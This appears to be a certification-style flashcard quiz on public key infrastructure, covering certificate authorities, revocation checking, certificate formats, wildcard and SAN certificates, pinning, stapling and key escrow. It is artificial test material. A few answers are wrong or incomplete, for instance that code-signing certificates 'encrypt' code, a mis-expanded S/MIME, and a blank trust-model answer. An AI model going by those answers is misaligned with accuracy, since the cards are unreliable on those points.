PKI quiz
A type of trusted third party that issues digital certificates used for creating digital signatures and public-private key pairs is known as:
CA (certificate authority)
What solutions allow to check whether a digital certificate has been revoked?
CRL: certificate revocation list OCSP: online certificate status protocol
What are the components of a three-level Certificate Authority (CA) hierarchy?
Root CA: top level of the hierarchy Intermediate CA: in the middle Issuing CA: 3rd level of the hierarchy
These certificates have a lower level of trustworthiness, because they are not signed by a Certificate Authority (CA).
Self-signed certificates
In a Public Key Infrastructure (PKI), which option best describes how users and multiple Certificate Authorities (CA) share information and exchange certificates?
Trust model:
a digital certificate used by software developers/publishers, following some sort of identity check and validation process by the CA, to encrypt the code of their scripts and executables. It uses the public-private key infrastructure (PKI) to bind the entity to the public key and a private key.
code signing certificate
A security engineer must install a X.509 certificate to a computer system, but it is not accepted. The system requires a Base64 encoded format. What must the security engineer execute to properly install this certificate?
conver to a .pem file A DER-encoded binary file can be represented as ASCII characters using Base64 Privacy-enhanced Electronic Mail (PEM) encoding
What is the purpose of a Certificate Signing Request (CSR)?
to obtain a certificate... A subject must complete a Certificate Signing Request (CSR) and submit it to the Certificate Authority (CA) to obtain a certificate. It is a Base64 ASCII file containing information about the requester including its public key.
A root Certificate Authority (CA) and intermediate CAs are fully deployed. The system administrator turns off the root CA server. Why is the root CA powered-down?
to prevent certificate compromise
this term refers to the process of verifying authenticity of a newly received digital certificate. Such process involves checking all the certificates in the chain of certificates from a trusted root CA, through any intermediate CAs, down to the certificate issued to the end user. A new certificate can only be trusted if each certificate in that certificate's chain is properly issued and valid.
Certificate chaining
Which property of a computer certificate is now deprecated in favor for a more structured and widely accepted standard?
Common Name was used to identify the fully qualified domain name (FQDN) of which the server is accessed, such as www.comptia.org. This has been deprecated as a method of validating subject identity.
In a digital certificate, the ____________ field describes a device, an individual, an organization, or any other entity the certificate has been issued for. In an SSL certificate, this refers to the Fully Qualified Domain Name (FQDN), which is the domain name of the server protected by the SSL certificate.
Common Name (CN)
These certificates prove a user's ownership rights to a domain.
Domain validation certificates
What are the characteristic features of the Distinguished Encoding Rules (DER) digital certificate format?
Encoded in binary format .der and .cer file extensions Generally used for Java servers
Which of the following answers refer to the P7B digital certificate format?
Encoded in text (ASCII Base64) format .p7b file extension Generally used for Microsoft windows and Java Tomcat servers
Which of the following answers refer to the Privacy Enhanced Email (PEM) digital certificate format?
Encoded in text (ASCII Base64) format .pem, .crt, .cer and .key file extensions Generally used for Apache servers or similar configurations
These certificates provide the highest level of trust and protection.
Extended Validation (EV) certificates
A company wants to ensure users can validate the website's certificate and establish a secure connection to mitigate Man-in-the-Middle (MitM) attacks on their public website. If a hacker compromises a certificate, which of the following will most likely circumvent the attack?
HPKP (HTTP Public Key Pinning): a method of trusting digital certificates to bypass the CA hierarchy and chain of trust and minimize MitM attacks. The client stores a public key that belongs (or is pinned) to a web server
These certificates provide improved security during authentication and authorization of individuals.
User digital certificates
examples of PKI trust models
Single CA model Hierarchical model (root CA + intermediate CAs) Mesh model (cross-certifying CAs) Web of trust model (all CAs act as root CAs) Client-server mutual authentication model
A digital certificate which allows multiple domains to be protected by a single certificate; a structured way to indicate all of the domain names and IP addresses that are secured by the certificate
Subject Alternative Name (SAN) certificate
What is the fastest way for checking the validity of a digital certificate?
OCSP: Online certificate status protocol
can be used to sign and encrypt email messages, typically using Secure Multipart Internet Message Extensions (S/MIME) or Pretty Good Privacy (PGP). The user's email address must be entered as the SAN and CN.
email certificate
A computer needs a signed certificate to authenticate to the network. What must the computer initiate with a Certificate Authority (CA)?
CSR (certificate signing request) must be completed by a subject who wants to obtain a certificate from a Certificate Authority (CA). The CSR is a Base64 ASCII file containing information about the requester including its public key.
-a Base64 ASCII file containing the information that the subject wants to use in the certificate, including its public key. -submitted to the CA to obtain a certificate
CSR - certificate signing request
Which of the answers listed below refers to a method for requesting a digital certificate?
CSR: certificate signing request
These certificates are used to verify the authenticity and integrity of software.
Code-signing certificates
These certificates are used to prove the identity of devices.
Computer certificates AKA machine certificates
Many certificates are used to verify identity. Which type of certificate could be issued to network appliances?
Machine: Machine certificates may be issued to network appliances, such as routers, switches, and firewalls.
Which certificate format allows the transfer of private keys and is password protected?
PFX A PFX, .pfx, or .p12 extension allows the export of a certificate along with its private key and is password protected. This is used to archive or transport a private key.
What refers to a hierarchical system for the creation, management, storage, distribution, and revocation of digital certificates?
Public Key infrastructure
A system admin must create 20 new certificates to accommodate web and file servers in different subdomains. This will cause a decrease in management overhead in the future, especially with plans to expand services in different branch locations. Which of the following types of certificates is most effective in alleviating management overhead in this scenario?
Wildcard
Which digital certificate type allows multiple subdomains to be protected by a single certificate?
Wildcard certificate
A company deployed an internal web portal for company-owned software and services. When user workstations go to the website from Internet Explorer, the site is not trusted. Evaluate the scenario to conclude the likely cause of this issue.
the root certificate is not imported
A system admin received a support ticket regarding a website error. Browsing to company.com in Internet Explorer, the site looks safe and trusted. However browsing to payment.company.com, the website is no longer trusted. Knowing a wildcard certificate was installed, how would the admin resolve this error?
update the SAN (subject alternative name)
An independent penetration company is invited to test the company's new banking application in development for Android phones. It uses Secure Sockets Layer/Transport Layer Security (SSL/TLS) certificates. Penetrations tests reveal the connections with clients were vulnerable to a Man-in-the-Middle (MITM) attack. How can the company prevent this from happening in the public Internet?
use certificate pinning: ensure it is inspecting the proper certificate when a client inspects the certificate presented by a server or a code-signed application
a certificate used with multiple sub-domains of a domain. They are represented with an asterisk (*) such as *.google.com.
wildcard certificate
There are various formats for encoding a certificate as a digital file for exchange between different systems. One difference is storing both public and private keys versus only storing a public key. Which of the following stores both public and private keys?
.p12: allows the export of the private key with the certificate .pfx: uses the same binay format as .P12
A security engineer received a .cer file. After some troubleshooting, the engineer was able to install the certificate with Base64 encoding using a different extension. Which of the following extensions did the engineer most likely use?
.pem
What are the characteristic features of the Personal Information Exchange (PFX) and P12 digital certificate format?
.pfx and .p12 file extensions Generally used for Microsoft windows servers Encoded in binary format
Servers designated as a root, intermediate, and issuing server, are examples of which type of implementation?
Certificate Authority (CA)
What is the PKI role of Registration Authority (RA)?
Accepting requests for digital certificates Authenticating the entity making the request
These certificates are self-signed certificates that identify a root Certificate Authority (CA).
Root certificates
A network administrator is importing a list of certificates from an online source so employees can trust and communicate securely with public websites. Another set of certificates were imported in order to trust and securely communicate with intranet sites and other internal resources. Which type of certificate is currently being imported?
Root: Public root certificates allow for users to trust a public website using a chain of trust to the root authority. Private organizations must load employee web browsers with internal root certificates to verify internal websites.
These certificates are used to encrypt and digitally sign email messages.
S/MIME certificates
-This extension field is the preferred mechanism to identify the DNS name or names by which a host is identified. -this field is structured to represent different types of identifiers, including domain names. If a certificate is configured it, the browser should validate that, and ignore the CN value -this field also allows a certificate to represent different subdomains
SAN - subject alternative name
A system admin installed a new certificate onto a web server. Browsing to the website, the browser shows trust errors. After clicking on the certificate icon, the website's name and information look correct. How would the system administrator troubleshoot further to find a root cause?
check certificate chain (chain of trust)
A company developed new software and would like the software to be validated. Which certificate should the company request?
code signing certificate: issued to a software publisher, following an identity check and validation process by the CA. The publisher then signs the executables or DLLs that make up the program to guarantee the validity of a software application or browser plug-in.
An up and coming entrepreneur wants to build an online business. During the creation of the website, the owner sends an email to a third-party certificate service and was able to set up a trusted and secure website in 24 hours. Which process supports the quick turnaround time for web server setup?
domain validation (proving the ownership of a domain)
The system administrator is installing a web server certificate and receives an error indicating the server does not accept wild card certificates. After examining the certificate, the system admin notices the problem. Analyze the error to determine the specific location where the admin found the problem.
in the SAN (subject alternative name) SAN: an extension field on a web server certificate using multiple subdomain labels to support the identification of the server.
A company with multiple types of archived encrypted data is looking to archive the keys needed to decrypt the data. However, the company wants to separate the two in order to heavily guard these keys. Analyze the scenario to determine the most likely key placement.
key escrow
A trusted third-party storage solution providing backup source for cryptographic keys is referred to as:
key escrow
A new employee at the office is having difficulty sending an encrypted email. The user confirmed with the system administrator the Secure/Multipurpose Internet Mail Extensions (S/MIME) plug-in was installed on the email client. Analyze the scenario to determine the cause of the issue.
need an email certificate
A private key is being exported to transfer to another server. There is no .pfx option. Which of the following certificate extensions can support the transfer of this private key?
p12
Which of the following answers refers to a deprecated security mechanism designed to defend HTTPS websites against impersonation attacks performed with the use of fraudulent digital certificates?
pinning: obsolete Internet security mechanism delivered via an HTTP header which allows HTTPS websites to resist impersonation by attackers using misissued or otherwise fraudulent digital certificates
Copies of lost private encryption keys can be retrieved from a key escrow by whom? They are individuals with access to key database and permission level allowing him/her to extract keys from escrow.
recovery agents
A Public Key Infrastructure (PKI) can produce many types of certificates with private/public key pairs. In contrast to a self-signed certificate, how does a wildcard certificate benefit an organization?
reduces management overhead
Which of the following allows for checking digital certificate revocation status without contacting Certificate Authority (CA)? It is used with Online Certificate Status Protocol (OCSP) that uses a SSL/TLS web server to make periodic requests from a CA about certificate statuses to reduce resource demands.
stapling